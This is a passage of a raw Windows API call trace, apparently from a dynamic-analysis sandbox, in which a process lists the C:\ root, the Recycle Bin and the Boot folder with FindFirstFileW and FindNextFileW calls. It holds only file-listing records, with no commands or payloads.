FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0154.529] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0154.529] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0154.529] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0154.529] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee630 | out: lpFindFileData=0x2ee630*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.529] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8b8) returned 1 [0154.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee8c4) returned 1 [0154.529] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.530] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin", lpFilePart=0x0) returned 0xf [0154.530] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\", lpFilePart=0x0) returned 0x10 [0154.530] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.530] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.530] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0154.530] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0154.531] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0154.531] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0154.531] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.531] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin", lpFilePart=0x0) returned 0xf [0154.531] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\", lpFilePart=0x0) returned 0x10 [0154.531] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.531] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.531] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0154.531] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.531] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee878) returned 1 [0154.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee884) returned 1 [0154.532] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.532] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpFilePart=0x0) returned 0x3e [0154.532] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpFilePart=0x0) returned 0x3f [0154.532] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.532] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.532] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0154.532] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0154.532] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.532] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee878) returned 1 [0154.533] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", nBufferLength=0x105, lpBuffer=0x2ee380, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpFilePart=0x0) returned 0x3e [0154.533] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", nBufferLength=0x105, lpBuffer=0x2ee354, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpFilePart=0x0) returned 0x3f [0154.533] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x2ee5a0 | out: lpFindFileData=0x2ee5a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.533] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.533] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0154.533] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5b0 | out: lpFindFileData=0x2ee5b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0154.533] FindClose (in: hFindFile=0x94ee8b0 | out: hFindFile=0x94ee8b0) returned 1 [0154.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee838) returned 1 [0154.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee844) returned 1 [0154.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee8b8) returned 1 [0154.534] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x2ee3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0154.534] GetFullPathNameW (in: lpFileName="C:\\Boot\\", nBufferLength=0x105, lpBuffer=0x2ee394, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\", lpFilePart=0x0) returned 0x8 [0154.534] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x2ee5e0 | out: lpFindFileData=0x2ee5e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94ee8b0 [0154.534] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.534] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1b0975c0, ftLastAccessTime.dwHighDateTime=0x1d5fc36, ftLastWriteTime.dwLowDateTime=0x1b0975c0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0154.534] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x1ab162e0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0154.534] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0154.534] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0154.535] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0154.536] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0154.536] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0154.536] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0154.536] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0154.536] FindNextFileW (in: hFindFile=0x94ee8b0, lpFindFileData=0x2ee5f0 | out: lpFindFileData=0x2ee5f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, 